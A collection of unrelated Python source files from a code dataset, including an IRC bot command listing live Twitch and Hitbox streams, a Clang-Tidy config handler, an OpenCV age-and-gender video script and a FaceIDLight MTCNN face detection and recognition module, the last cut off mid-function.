twitchers.append(twitcher)
twitchers = ",".join(twitchers)
try:
js = willie.web.get("https://api.twitch.tv/kraken/streams?channel=%s" % twitchers, timeout=10, verify_ssl=False)
return json.loads(js)
except:# whatever web.get throws and possible valueerror from json.loads
return None
def lookup_hitbox(team="speedfriends"):
try:
js = willie.web.get("https://api.hitbox.tv/team/%s?liveonly=true&media=true&fast=true"% team, timeout=10, verify_ssl=False)
return json.loads(js)
except:# same thing here
return None
@willie.module.commands("streams")
@willie.module.thread(True)
def streams(bot, trigger):
tw = lookup_twitch()
hb = lookup_hitbox()
msgs = []
msg = ""
c = 0
if hb is not None:
streams = hb["media"]["livestream"]
for stream in streams:
msg += "\x0313https://hitbox.tv/%s\x03 %s \x0313|\x03 " % (stream["media_display_name"].lower(), stream["media_status"])
c += 1
            if c % 4 == 0:
msgs.append(msg)
msg = ""
if tw is not None:
streams = tw["streams"]
for stream in streams:
if len(stream["channel"]["status"]) < 2 and stream["game"]:
description = stream["game"]
else:
description = stream["channel"]["status"].rstrip("\n")
msg += "\x037http://twitch.tv/%s\x03 %s \x033|\x03 " % (stream["channel"]["name"], description)
c += 1
            if c % 4 == 0:
msgs.append(msg)
msg = ""
if msg:# add the remaining streams
msgs.append(msg)
if not msgs:
bot.reply("No streams found, try again later")
return
for msg in msgs:
bot.say(msg[:-3])# cut the last 3 characters which are normally used as dividers
|
StarcoderdataPython
|
3554338
|
<reponame>cyrilbois/PFNET.py<gh_stars>1-10
#***************************************************#
# This file is part of PFNET. #
# #
# Copyright (c) 2015-2017, <NAME>. #
# #
# PFNET is released under the BSD 2-clause license. #
#***************************************************#
from .dummy_function import DummyGenCost
|
StarcoderdataPython
|
1653995
|
# -------------------------------------------------------------------------
#
# Part of the CodeChecker project, under the Apache License v2.0 with
# LLVM Exceptions. See LICENSE for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
#
# -------------------------------------------------------------------------
"""
Config handler for Clang Tidy analyzer.
"""
from codechecker_common.logger import get_logger
from .. import config_handler
LOG = get_logger('analyzer.tidy')
class ClangTidyConfigHandler(config_handler.AnalyzerConfigHandler):
"""
Configuration handler for Clang-tidy analyzer.
"""
def __init__(self):
super(ClangTidyConfigHandler, self).__init__()
def set_checker_enabled(self, checker_name, enabled=True):
"""
Enable checker, keep description if already set.
"""
if checker_name.startswith('W') or \
checker_name.startswith('clang-diagnostic'):
self.add_checker(checker_name)
super(ClangTidyConfigHandler, self).set_checker_enabled(checker_name,
enabled)
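    # Note on set_checker_enabled() above: compiler-warning style names (starting with "W")
    # and "clang-diagnostic-*" checkers are registered via add_checker() first, so that the
    # base-class enable/disable logic can find them; all other names pass straight through.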
|
StarcoderdataPython
|
381610
|
import typing
import sys
import numpy as np
import numba as nb
from numba import njit, i8
@njit
def seg_f(
a: int,
b: int,
) -> int:
if a >= b: return a
return b
@njit
def seg_e() -> int:
return 0
@njit
def build_seg(
raw: np.array,
) -> np.array:
n = raw.size
a = np.zeros(
n << 1,
dtype=np.int64,
)
a[n:] = raw
for i in range(n - 1, 0, -1):
a[i] = seg_f(
a[i << 1],
a[i << 1 | 1],
)
return a
@njit
def set_val(
seg: np.array,
i: int,
x: int,
) -> typing.NoReturn:
n = seg.size // 2
i += n
seg[i] = x
while i > 1:
i >>= 1
seg[i] = seg_f(
seg[i << 1],
seg[i << 1 | 1],
)
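# Illustrative behaviour of the two helpers above (max segment tree, 1-indexed internal nodes):
#   build_seg(np.array([1, 3, 2, 4], dtype=np.int64)) -> [0, 4, 3, 4, 1, 3, 2, 4]
# leaves sit at indices 4..7, each parent i stores max(seg[2*i], seg[2*i + 1]),
# and seg[1] holds the overall maximum.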
@njit(
(i8, i8[:], i8[:]),
cache=True,
)
def solve(
n: int,
h: np.array,
a: np.array,
) -> typing.NoReturn:
h -= 1
seg = np.zeros(
n,
dtype=np.int64,
)
seg = build_seg(seg)
print(seg)
def main() -> typing.NoReturn:
n = int(input())
h = np.array(
sys.stdin.readline()
.split(),
dtype=np.int64,
)
a = np.array(
sys.stdin.readline()
.split(),
dtype=np.int64,
)
solve(n, h, a)
main()
|
StarcoderdataPython
|
8159608
|
import os
import math
import time
import cv2 as cv
import numpy as np
from age_gender_ssrnet.SSRNET_model import SSR_net_general, SSR_net
from time import sleep
# Desired width and height to process video.
# Typically it should be smaller than original video frame
# as smaller size significantly speeds up processing almost without affecting quality.
width = 480
height = 340
# Choose which face detector to use. Select 'haar' or 'net'
face_detector_kind = 'haar'
# Choose what age and gender model to use. Specify 'ssrnet' or 'net'
age_gender_kind = 'ssrnet'
# Diagonal and line thickness are computed at run-time
diagonal, line_thickness = None, None
# Initialize numpy random generator
np.random.seed(int(time.time()))
# Set video to load
videos = []
for file_name in os.listdir('videos'):
file_name = 'videos/' + file_name
if os.path.isfile(file_name) and file_name.endswith('.mp4'):
videos.append(file_name)
source_path = videos[np.random.randint(len(videos))]
# Create a video capture object to read videos
cap = cv.VideoCapture(source_path)
# Initialize face detector
if (face_detector_kind == 'haar'):
face_cascade = cv.CascadeClassifier('face_haar/haarcascade_frontalface_alt.xml')
else:
face_net = cv.dnn.readNetFromTensorflow('face_net/opencv_face_detector_uint8.pb', 'face_net/opencv_face_detector.pbtxt')
gender_net = None
age_net = None
# Load age and gender models
if (age_gender_kind == 'ssrnet'):
# Setup global parameters
face_size = 64
face_padding_ratio = 0.10
# Default parameters for SSR-Net
stage_num = [3, 3, 3]
lambda_local = 1
lambda_d = 1
# Initialize gender net
gender_net = SSR_net_general(face_size, stage_num, lambda_local, lambda_d)()
gender_net.load_weights('age_gender_ssrnet/ssrnet_gender_3_3_3_64_1.0_1.0.h5')
# Initialize age net
age_net = SSR_net(face_size, stage_num, lambda_local, lambda_d)()
age_net.load_weights('age_gender_ssrnet/ssrnet_age_3_3_3_64_1.0_1.0.h5')
else:
# Setup global parameters
face_size = 227
face_padding_ratio = 0.0
# Initialize gender detector
gender_net = cv.dnn.readNetFromCaffe('age_gender_net/deploy_gender.prototxt', 'age_gender_net/gender_net.caffemodel')
# Initialize age detector
age_net = cv.dnn.readNetFromCaffe('age_gender_net/deploy_age.prototxt', 'age_gender_net/age_net.caffemodel')
# Class labels for gender_net and age_net outputs
Genders = ['Male', 'Female']
Ages = ['(0-2)', '(4-6)', '(8-12)', '(15-20)', '(25-32)', '(38-43)', '(48-53)', '(60-100)']
def calculateParameters(height_orig, width_orig):
global width, height, diagonal, line_thickness
area = width * height
width = int(math.sqrt(area * width_orig / height_orig))
height = int(math.sqrt(area * height_orig / width_orig))
# Calculate diagonal
diagonal = math.sqrt(height * height + width * width)
# Calculate line thickness to draw boxes
line_thickness = max(1, int(diagonal / 150))
# Initialize output video writer
global out
fps = cap.get(cv.CAP_PROP_FPS)
fourcc = cv.VideoWriter_fourcc(*'XVID')
out = cv.VideoWriter('video.avi', fourcc=fourcc, fps=fps, frameSize=(width, height))
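# Worked example (illustrative): for a 1920x1080 source and the default 480x340 target,
# the preserved area is 163200 px, giving width=538, height=302, diagonal ~617 and
# line_thickness=4.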
def findFaces(img, confidence_threshold=0.7):
# Get original width and height
height = img.shape[0]
width = img.shape[1]
face_boxes = []
if (face_detector_kind == 'haar'):
# Get grayscale image
gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
# Detect faces
detections = face_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5)
for (x, y, w, h) in detections:
padding_h = int(math.floor(0.5 + h * face_padding_ratio))
padding_w = int(math.floor(0.5 + w * face_padding_ratio))
x1, y1 = max(0, x - padding_w), max(0, y - padding_h)
x2, y2 = min(x + w + padding_w, width - 1), min(y + h + padding_h, height - 1)
face_boxes.append([x1, y1, x2, y2])
else:
# Convert input image to 3x300x300, as NN model expects only 300x300 RGB images
blob = cv.dnn.blobFromImage(img, 1.0, (300, 300), mean=(104, 117, 123), swapRB=True, crop=False)
# Pass blob through model and get detected faces
face_net.setInput(blob)
detections = face_net.forward()
for i in range(detections.shape[2]):
confidence = detections[0, 0, i, 2]
if (confidence < confidence_threshold):
continue
x1 = int(detections[0, 0, i, 3] * width)
y1 = int(detections[0, 0, i, 4] * height)
x2 = int(detections[0, 0, i, 5] * width)
y2 = int(detections[0, 0, i, 6] * height)
padding_h = int(math.floor(0.5 + (y2 - y1) * face_padding_ratio))
padding_w = int(math.floor(0.5 + (x2 - x1) * face_padding_ratio))
x1, y1 = max(0, x1 - padding_w), max(0, y1 - padding_h)
x2, y2 = min(x2 + padding_w, width - 1), min(y2 + padding_h, height - 1)
face_boxes.append([x1, y1, x2, y2])
return face_boxes
def collectFaces(frame, face_boxes):
faces = []
# Process faces
for i, box in enumerate(face_boxes):
# Convert box coordinates from resized frame_bgr back to original frame
box_orig = [
int(round(box[0] * width_orig / width)),
int(round(box[1] * height_orig / height)),
int(round(box[2] * width_orig / width)),
int(round(box[3] * height_orig / height)),
]
# Extract face box from original frame
face_bgr = frame[
max(0, box_orig[1]):min(box_orig[3] + 1, height_orig - 1),
max(0, box_orig[0]):min(box_orig[2] + 1, width_orig - 1),
:
]
faces.append(face_bgr)
return faces
def predictAgeGender(faces):
if (age_gender_kind == 'ssrnet'):
# Convert faces to N,64,64,3 blob
blob = np.empty((len(faces), face_size, face_size, 3))
for i, face_bgr in enumerate(faces):
blob[i, :, :, :] = cv.resize(face_bgr, (64, 64))
blob[i, :, :, :] = cv.normalize(blob[i, :, :, :], None, alpha=0, beta=255, norm_type=cv.NORM_MINMAX)
# Predict gender and age
genders = gender_net.predict(blob)
ages = age_net.predict(blob)
# Construct labels
labels = ['{},{}'.format('Male' if (gender >= 0.5) else 'Female', int(age)) for (gender, age) in zip(genders, ages)]
else:
# Convert faces to N,3,227,227 blob
blob = cv.dnn.blobFromImages(faces, scalefactor=1.0, size=(227, 227),
mean=(78.4263377603, 87.7689143744, 114.895847746), swapRB=False)
# Predict gender
gender_net.setInput(blob)
genders = gender_net.forward()
# Predict age
age_net.setInput(blob)
ages = age_net.forward()
# Construct labels
labels = ['{},{}'.format(Genders[gender.argmax()], Ages[age.argmax()]) for (gender, age) in zip(genders, ages)]
return labels
# Process video
paused = False
while cap.isOpened():
success, frame = cap.read()
if not success:
break
# Calculate parameters if not yet
if (diagonal is None):
height_orig, width_orig = frame.shape[0:2]
calculateParameters(height_orig, width_orig)
    # Resize the frame to the processing resolution if necessary
if ((height, width) != frame.shape[0:2]):
frame_bgr = cv.resize(frame, dsize=(width, height), fx=0, fy=0)
else:
frame_bgr = frame
# Detect faces
face_boxes = findFaces(frame_bgr)
# Make a copy of original image
faces_bgr = frame_bgr.copy()
if (len(face_boxes) > 0):
# Draw boxes in faces_bgr image
for (x1, y1, x2, y2) in face_boxes:
cv.rectangle(faces_bgr, (x1, y1), (x2, y2), color=(0, 255, 0), thickness=line_thickness, lineType=8)
# Collect all faces into matrix
faces = collectFaces(frame, face_boxes)
# Get age and gender
labels = predictAgeGender(faces)
# Draw labels
for (label, box) in zip(labels, face_boxes):
cv.putText(faces_bgr, label, org=(box[0], box[1] - 10), fontFace=cv.FONT_HERSHEY_PLAIN,
fontScale=1, color=(0, 64, 255), thickness=1, lineType=cv.LINE_AA)
# Show frames
cv.imshow('Source', frame_bgr)
cv.imshow('Faces', faces_bgr)
# Write output frame
out.write(faces_bgr)
# Quit on ESC button, pause on SPACE
key = (cv.waitKey(1 if (not paused) else 0) & 0xFF)
if (key == 27):
break
elif (key == 32):
paused = (not paused)
sleep(0.001)
cap.release()
out.release()
cv.destroyAllWindows()
|
StarcoderdataPython
|
238135
|
from flask import Blueprint
user_blueprint = Blueprint('user', __name__, template_folder='templates')
from . import routes
|
StarcoderdataPython
|
3393583
|
<reponame>dualtob/FaceIDLight<gh_stars>1-10
# -*- coding: utf-8 -*-
# MIT License
#
# Copyright (c) 2021 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Parts of this code are derived and copied from the MTCNN implementation by Iván de Paz Centeno
# https://github.com/ipazc/mtcnn
import tflite_runtime.interpreter as tflite
import cv2
import numpy as np
import os
import glob
from skimage.transform import SimilarityTransform
from FaceIDLight.helper import get_file
from scipy.spatial import distance
from sklearn.metrics.pairwise import cosine_distances
BASE_URL = "https://github.com/Martlgap/FaceIDLight/releases/download/v.0.1/"
FILE_HASHES = {
"o_net": "768385d570300648b7b881acbd418146522b79b4771029bb2e684bdd8c764b9f",
"p_net": "530183192e24f7cc86b6706e1eb600482c4ed4306399ac939c472e3957bae15e",
"r_net": "5ec33b065eb2802bc4c2575d21feff1a56958d854785bc3e2907d3b7ace861a2",
"mobileNet": "6c19b789f661caa8da735566490bfd8895beffb2a1ec97a56b126f0539991aa6",
"resNet50": "f4d8b0194957a3ad766135505fc70a91343660151a8103bbb6c3b8ac34dbb4e2",
"sample_gallery": "9f43a83c89a8099e1f3aab75ed9531f932f1b392bea538d6afe52509587438d4",
}
class FaceID:
def __init__(self, gal_dir: str = None):
self.detector = FaceDetection()
self.recognizer = FaceRecognition()
self.gal_embs = []
self.gal_names = []
self.gal_faces = []
self.gal_dir = (
gal_dir if gal_dir is not None else get_file(BASE_URL + "sample_gallery.zip", FILE_HASHES["sample_gallery"], is_zip=True)
)
self.update_gallery()
def update_gallery(self):
files = glob.glob("{}/*.jpg".format(self.gal_dir)) + glob.glob("{}/*.png".format(self.gal_dir))
for file in files:
img = cv2.imread(file)
# TODO check if image is too large!
detections = self.detector.detect_faces(img) # Must be BGR and float32 [0..255]
if not detections:
continue
_, points, _ = detections[0] # Only take highest-score face
self.gal_names.append(os.path.basename(file).split(".")[0])
face = self.detector.get_face(img, points)
self.gal_faces.append(
cv2.cvtColor(face.astype(np.float32) / 255, cv2.COLOR_BGR2RGB)
) # RGB and float32 [0..1]
# Get all embeddings in parallel
# TODO handle maximum number of parallel invoke
self.gal_embs = self.recognizer.get_emb(np.asarray(self.gal_faces))[0]
def recognize_faces(self, img):
detections = self.detector.detect_faces(img) # Must be BGR and float32 [0..255]
if not detections:
return []
faces = []
for detection in detections:
bbox, points, conf = detection
face = self.detector.get_face(img, points)
faces.append(cv2.cvtColor(face.astype(np.float32) / 255, cv2.COLOR_BGR2RGB))
embs = self.recognizer.get_emb(np.asarray(faces))[0] # RGB float32 [0..1]
ids = []
for i in range(embs.shape[0]):
pred, dist, conf = self.recognizer.identify(np.expand_dims(embs[i], axis=0), self.gal_embs, thresh=0.6)
ids.append(
[
self.gal_names[pred] if pred is not None else "Other",
cv2.cvtColor(self.gal_faces[pred] * 255, cv2.COLOR_RGB2BGR) if pred is not None else None,
dist,
conf,
]
)
faces_ = []
for face in faces:
faces_.append(cv2.cvtColor(face * 255, cv2.COLOR_RGB2BGR))
out = [i for i in zip(faces_, detections, ids)]
return out
def tflite_inference(model, img):
"""Inferences an image through the model with tflite interpreter on CPU
:param model: a tflite.Interpreter loaded with a model
:param img: image
:return: list of outputs of the model
"""
input_details = model.get_input_details()
output_details = model.get_output_details()
model.resize_tensor_input(input_details[0]["index"], img.shape)
model.allocate_tensors()
model.set_tensor(input_details[0]["index"], img.astype(np.float32))
model.invoke()
return [model.get_tensor(elem["index"]) for elem in output_details]
class FaceRecognition:
def __init__(
self,
model_path: str = None,
model_type: str = "mobileNet",
):
if model_path is None:
model_path = get_file(BASE_URL + model_type + ".tflite", FILE_HASHES[model_type])
self.face_recognizer = tflite.Interpreter(model_path=model_path)
def get_emb(self, img):
"""inferences a facial image through the face recognition model
:param img: image with aligned face must be 4-dim
:return: output of the model
Alignment:
Must be like specified TODO
"""
return tflite_inference(self.face_recognizer, img)
@staticmethod
def verify(emb1, emb2, thresh):
"""
TODO
:param emb1:
:param emb2:
:param thresh:
:return:
"""
dist = distance.cosine(emb1, emb2)
prediction = thresh > np.squeeze(dist, axis=-1)
confidence = (
((thresh - dist) / thresh) / 2 + 0.5
if prediction
else ((dist - thresh) / (1.4 - thresh)) / 2 + 0.5
)
return prediction, np.squeeze(dist, axis=-1), confidence
@staticmethod
def identify(emb_src, embs_gal, thresh=None):
"""
TODO
:param emb_src:
:param embs_gal:
:param thresh:
:return:
"""
dists = cosine_distances(emb_src, embs_gal)[0]
pred = np.argmin(dists)
if thresh and dists[pred] > thresh: # if OpenSet set prediction to None if above threshold
idx = np.argsort(dists)
conf = (dists[idx[0]] - thresh) / (1.4 - thresh)
dist = dists[idx[0]]
pred = None
else:
idx = np.argsort(dists)
conf = (dists[idx[1]] - dists[pred]) / 1.4
dist = dists[pred]
return pred, dist, conf
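# Note on identify() above: when thresh is given (FaceID.recognize_faces passes 0.6), a query
# whose closest gallery distance exceeds the threshold is rejected (pred is None), turning the
# closed-set nearest-neighbour search into open-set identification.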
class StageStatus:
"""
Keeps status between MTCNN stages
"""
def __init__(self, pad_result: tuple = None, width=0, height=0):
self.width = width
self.height = height
self.dy = self.edy = self.dx = self.edx = self.y = self.ey = self.x = self.ex = self.tmp_w = self.tmp_h = []
if pad_result is not None:
self.update(pad_result)
def update(self, pad_result: tuple):
s = self
s.dy, s.edy, s.dx, s.edx, s.y, s.ey, s.x, s.ex, s.tmp_w, s.tmp_h = pad_result
class FaceDetection:
"""
Allows to perform MTCNN Detection ->
a) Detection of faces (with the confidence probability)
b) Detection of keypoints (left eye, right eye, nose, mouth_left, mouth_right)
"""
def __init__(
self,
min_face_size: int = 40,
steps_threshold: list = None,
scale_factor: float = 0.7,
):
"""
Initializes the MTCNN.
:param min_face_size: minimum size of the face to detect
:param steps_threshold: step's thresholds values
:param scale_factor: scale factor
"""
if steps_threshold is None:
steps_threshold = [0.6, 0.7, 0.7] # original mtcnn values [0.6, 0.7, 0.7]
self._min_face_size = min_face_size
self._steps_threshold = steps_threshold
self._scale_factor = scale_factor
self.p_net = tflite.Interpreter(
model_path=get_file(BASE_URL + "p_net.tflite", FILE_HASHES["p_net"])
)
self.r_net = tflite.Interpreter(
model_path=get_file(BASE_URL + "r_net.tflite", FILE_HASHES["r_net"])
)
self.o_net = tflite.Interpreter(
model_path=get_file(BASE_URL + "o_net.tflite", FILE_HASHES["o_net"])
)
def detect_faces(self, img):
"""
Detects bounding boxes from the specified image.
:param img: image to process
:return: list containing all the bounding boxes detected with their keypoints.
From MTCNN:
# Total boxes (bBoxes for faces)
# 1. dim -> Number of found Faces
# 2. dim -> x_min, y_min, x_max, y_max, score
# Points (Landmarks left eye, right eye, nose, left mouth, right mouth)
# 1. dim -> Number of found Faces
        # 2. dim -> x1, x2, x3, x4, x5, y1, y2, y3, y4, y5 Coordinates
"""
# TODO check if HD or UHD or 4K -> lower the resolution for performance!
height, width, _ = img.shape
stage_status = StageStatus(width=width, height=height)
m = 12 / self._min_face_size
min_layer = np.amin([height, width]) * m
scales = self.__compute_scale_pyramid(m, min_layer)
# We pipe here each of the stages
total_boxes, stage_status = self.__stage1(img, scales, stage_status)
total_boxes, stage_status = self.__stage2(img, total_boxes, stage_status)
bboxes, points = self.__stage3(img, total_boxes, stage_status)
# Transform to better shape and points now inside bbox
detections = []
for i in range(bboxes.shape[0]):
bboxes_c = np.reshape(bboxes[i, :-1], [2, 2]).astype(np.float32)
points_c = np.reshape(points[i], [2, 5]).transpose().astype(np.float32)
conf = bboxes[i, -1].astype(np.float32)
detections.append([bboxes_c, points_c, conf])
return detections
def __compute_scale_pyramid(self, m, min_layer):
scales = []
factor_count = 0
while min_layer >= 12:
scales += [m * np.power(self._scale_factor, factor_count)]
min_layer = min_layer * self._scale_factor
factor_count += 1
return scales
@staticmethod
def __scale_image(image, scale: float):
"""
Scales the image to a given scale.
:param image:
:param scale:
:return:
"""
height, width, _ = image.shape
width_scaled = int(np.ceil(width * scale))
height_scaled = int(np.ceil(height * scale))
im_data = cv2.resize(image, (width_scaled, height_scaled), interpolation=cv2.INTER_AREA)
# Normalize the image's pixels
im_data_normalized = (im_data - 127.5) * 0.0078125
return im_data_normalized
@staticmethod
def __generate_bounding_box(imap, reg, scale, t):
# use heatmap to generate bounding boxes
stride = 2
cellsize = 12
imap = np.transpose(imap)
dx1 = np.transpose(reg[:, :, 0])
dy1 = np.transpose(reg[:, :, 1])
dx2 = np.transpose(reg[:, :, 2])
dy2 = np.transpose(reg[:, :, 3])
y, x = np.where(imap >= t)
if y.shape[0] == 1:
dx1 = np.flipud(dx1)
dy1 = np.flipud(dy1)
dx2 = np.flipud(dx2)
dy2 = np.flipud(dy2)
score = imap[(y, x)]
reg = np.transpose(np.vstack([dx1[(y, x)], dy1[(y, x)], dx2[(y, x)], dy2[(y, x)]]))
if reg.size == 0:
reg = np.empty(shape=(0, 3))
bb = np.transpose(np.vstack([y, x]))
q1 = np.fix((stride * bb + 1) / scale)
q2 = np.fix((stride * bb + cellsize) / scale)
boundingbox = np.hstack([q1, q2, np.expand_dims(score, 1), reg])
return boundingbox, reg
@staticmethod
def __nms(boxes, threshold, method):
"""
Non Maximum Suppression.
:param boxes: np array with bounding boxes.
:param threshold:
:param method: NMS method to apply. Available values ('Min', 'Union')
:return:
"""
if boxes.size == 0:
return np.empty((0, 3))
x1 = boxes[:, 0]
y1 = boxes[:, 1]
x2 = boxes[:, 2]
y2 = boxes[:, 3]
s = boxes[:, 4]
area = (x2 - x1 + 1) * (y2 - y1 + 1)
sorted_s = np.argsort(s)
pick = np.zeros_like(s, dtype=np.int16)
counter = 0
while sorted_s.size > 0:
i = sorted_s[-1]
pick[counter] = i
counter += 1
idx = sorted_s[0:-1]
xx1 = np.maximum(x1[i], x1[idx])
yy1 = np.maximum(y1[i], y1[idx])
xx2 = np.minimum(x2[i], x2[idx])
yy2 = np.minimum(y2[i], y2[idx])
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
if method == "Min":
o = inter / np.minimum(area[i], area[idx])
else:
o = inter / (area[i] + area[idx] - inter)
sorted_s = sorted_s[np.where(o <= threshold)]
pick = pick[0:counter]
return pick
@staticmethod
def __pad(total_boxes, w, h):
# compute the padding coordinates (pad the bounding boxes to square)
tmp_w = (total_boxes[:, 2] - total_boxes[:, 0] + 1).astype(np.int32)
tmp_h = (total_boxes[:, 3] - total_boxes[:, 1] + 1).astype(np.int32)
numbox = total_boxes.shape[0]
dx = np.ones(numbox, dtype=np.int32)
dy = np.ones(numbox, dtype=np.int32)
edx = tmp_w.copy().astype(np.int32)
edy = tmp_h.copy().astype(np.int32)
x = total_boxes[:, 0].copy().astype(np.int32)
y = total_boxes[:, 1].copy().astype(np.int32)
ex = total_boxes[:, 2].copy().astype(np.int32)
ey = total_boxes[:, 3].copy().astype(np.int32)
tmp = np.where(ex > w)
edx.flat[tmp] = np.expand_dims(-ex[tmp] + w + tmp_w[tmp], 1)
ex[tmp] = w
tmp = np.where(ey > h)
edy.flat[tmp] = np.expand_dims(-ey[tmp] + h + tmp_h[tmp], 1)
ey[tmp] = h
tmp = np.where(x < 1)
dx.flat[tmp] = np.expand_dims(2 - x[tmp], 1)
x[tmp] = 1
tmp = np.where(y < 1)
dy.flat[tmp] = np.expand_dims(2 - y[tmp], 1)
y[tmp] = 1
return dy, edy, dx, edx, y, ey, x, ex, tmp_w, tmp_h
@staticmethod
def __rerec(bbox):
# convert bbox to square
height = bbox[:, 3] - bbox[:, 1]
width = bbox[:, 2] - bbox[:, 0]
max_side_length = np.maximum(width, height)
bbox[:, 0] = bbox[:, 0] + width * 0.5 - max_side_length * 0.5
bbox[:, 1] = bbox[:, 1] + height * 0.5 - max_side_length * 0.5
bbox[:, 2:4] = bbox[:, 0:2] + np.transpose(np.tile(max_side_length, (2, 1)))
return bbox
@staticmethod
def __bbreg(boundingbox, reg):
# calibrate bounding boxes
if reg.shape[1] == 1:
reg = np.reshape(reg, (reg.shape[2], reg.shape[3]))
w = boundingbox[:, 2] - boundingbox[:, 0] + 1
h = boundingbox[:, 3] - boundingbox[:, 1] + 1
b1 = boundingbox[:, 0] + reg[:, 0] * w
b2 = boundingbox[:, 1] + reg[:, 1] * h
b3 = boundingbox[:, 2] + reg[:, 2] * w
b4 = boundingbox[:, 3] + reg[:, 3] * h
boundingbox[:, 0:4] = np.transpose(np.vstack([b1, b2, b3, b4]))
return boundingbox
def __stage1(self, image, scales: list, stage_status: StageStatus):
"""
First stage of the MTCNN.
:param image:
:param scales:
:param stage_status:
:return:
"""
total_boxes = np.empty((0, 9))
status = stage_status
for scale in scales:
scaled_image = self.__scale_image(image, scale)
img_x = np.expand_dims(scaled_image, 0)
img_y = np.transpose(img_x, (0, 2, 1, 3))
out = tflite_inference(self.p_net, img_y)
out0 = np.transpose(out[0], (0, 2, 1, 3))
out1 = np.transpose(out[1], (0, 2, 1, 3))
boxes, _ = self.__generate_bounding_box(
out1[0, :, :, 1].copy(),
out0[0, :, :, :].copy(),
scale,
self._steps_threshold[0],
)
# inter-scale nms
pick = self.__nms(boxes.copy(), 0.5, "Union")
if boxes.size > 0 and pick.size > 0:
boxes = boxes[pick, :]
total_boxes = np.append(total_boxes, boxes, axis=0)
numboxes = total_boxes.shape[0]
if numboxes > 0:
pick = self.__nms(total_boxes.copy(), 0.7, "Union")
total_boxes = total_boxes[pick, :]
regw = total_boxes[:, 2] - total_boxes[:, 0]
regh = total_boxes[:, 3] - total_boxes[:, 1]
qq1 = total_boxes[:, 0] + total_boxes[:, 5] * regw
qq2 = total_boxes[:, 1] + total_boxes[:, 6] * regh
qq3 = total_boxes[:, 2] + total_boxes[:, 7] * regw
qq4 = total_boxes[:, 3] + total_boxes[:, 8] * regh
total_boxes = np.transpose(np.vstack([qq1, qq2, qq3, qq4, total_boxes[:, 4]]))
total_boxes = self.__rerec(total_boxes.copy())
total_boxes[:, 0:4] = np.fix(total_boxes[:, 0:4]).astype(np.int32)
status = StageStatus(
self.__pad(total_boxes.copy(), stage_status.width, stage_status.height),
width=stage_status.width,
height=stage_status.height,
)
return total_boxes, status
def __stage2(self, img, total_boxes, stage_status: StageStatus):
"""
Second stage of the MTCNN.
:param img:
:param total_boxes:
:param stage_status:
:return:
"""
num_boxes = total_boxes.shape[0]
if num_boxes == 0:
return total_boxes, stage_status
# second stage
tempimg = np.zeros(shape=(24, 24, 3, num_boxes))
for k in range(0, num_boxes):
tmp = np.zeros((int(stage_status.tmp_h[k]), int(stage_status.tmp_w[k]), 3))
tmp[stage_status.dy[k] - 1 : stage_status.edy[k], stage_status.dx[k] - 1 : stage_status.edx[k], :,] = img[
stage_status.y[k] - 1 : stage_status.ey[k],
stage_status.x[k] - 1 : stage_status.ex[k],
:,
]
            if (tmp.shape[0] > 0 and tmp.shape[1] > 0) or (tmp.shape[0] == 0 and tmp.shape[1] == 0):
tempimg[:, :, :, k] = cv2.resize(tmp, (24, 24), interpolation=cv2.INTER_AREA)
else:
return np.empty(shape=(0,)), stage_status
tempimg = (tempimg - 127.5) * 0.0078125
tempimg1 = np.transpose(tempimg, (3, 1, 0, 2))
out = tflite_inference(self.r_net, tempimg1)
out0 = np.transpose(out[0])
out1 = np.transpose(out[1])
score = out1[1, :]
ipass = np.where(score > self._steps_threshold[1])
total_boxes = np.hstack([total_boxes[ipass[0], 0:4].copy(), np.expand_dims(score[ipass].copy(), 1)])
mv = out0[:, ipass[0]]
if total_boxes.shape[0] > 0:
pick = self.__nms(total_boxes, 0.7, "Union")
total_boxes = total_boxes[pick, :]
total_boxes = self.__bbreg(total_boxes.copy(), np.transpose(mv[:, pick]))
total_boxes = self.__rerec(total_boxes.copy())
return total_boxes, stage_status
def __stage3(self, img, total_boxes, stage_status: StageStatus):
"""
Third stage of the MTCNN.
:param img:
:param total_boxes:
:param stage_status:
:return:
"""
num_boxes = total_boxes.shape[0]
if num_boxes == 0:
return total_boxes, np.empty(shape=(0,))
total_boxes = np.fix(total_boxes).astype(np.int32)
status = StageStatus(
self.__pad(total_boxes.copy(), stage_status.width, stage_status.height),
width=stage_status.width,
height=stage_status.height,
)
tempimg = np.zeros((48, 48, 3, num_boxes))
for k in range(0, num_boxes):
tmp = np.zeros((int(status.tmp_h[k]), int(status.tmp_w[k]), 3))
tmp[status.dy[k] - 1 : status.edy[k], status.dx[k] - 1 : status.edx[k], :] = img[
status.y[k] - 1 : status.ey[k], status.x[k] - 1 : status.ex[k], :
]
            if (tmp.shape[0] > 0 and tmp.shape[1] > 0) or (tmp.shape[0] == 0 and tmp.shape[1] == 0):
tempimg[:, :, :, k] = cv2.resize(tmp, (48, 48), interpolation=cv2.INTER_AREA)
else:
return np.empty(shape=(0,)), np.empty(shape=(0,))
tempimg = (tempimg - 127.5) * 0.0078125
tempimg1 = np.transpose(tempimg, (3, 1, 0, 2))
out = tflite_inference(self.o_net, tempimg1)
out0 = np.transpose(out[0])
out1 = np.transpose(out[1])
out2 = np.transpose(out[2])
score = out2[1, :]
points = out1
ipass = np.where(score > self._steps_threshold[2])
points = points[:, ipass[0]]
total_boxes = np.hstack([total_boxes[ipass[0], 0:4].copy(), np.expand_dims(score[ipass].copy(), 1)])
